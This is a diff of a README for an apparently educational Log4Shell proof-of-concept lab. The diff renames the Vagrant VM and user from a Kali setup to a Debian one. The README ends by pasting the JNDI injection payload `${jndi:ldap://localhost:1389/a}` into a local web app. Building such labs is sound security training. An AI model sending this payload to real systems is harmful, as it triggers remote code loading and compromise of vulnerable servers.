ttgithg/rm_poc_log4shell/README.md

 5. Check status: `vagrant status`

-6. Create VM + provision: `vagrant up kalilab`
+6. Create VM + provision: `vagrant up deblab`

-    **Note**: In case of errors correct them and try provisioning again with: `vagrant provision kalilab`
+    **Note**: In case of errors correct them and try provisioning again with: `vagrant provision deblab`

-7. Connect with ssh: `vagrant ssh kalilab`
+7. Connect with ssh: `vagrant ssh deblab`

 ## Lab environment

-Open the kalilab GUI and login with kauser.
+Open the deblab GUI and login with debuser.
 We will need 3 terminals for this setup to manage a log4shell hack.
 We open the browser on the localhost:8080 and past the given request: `${jndi:ldap://localhost:1389/a}`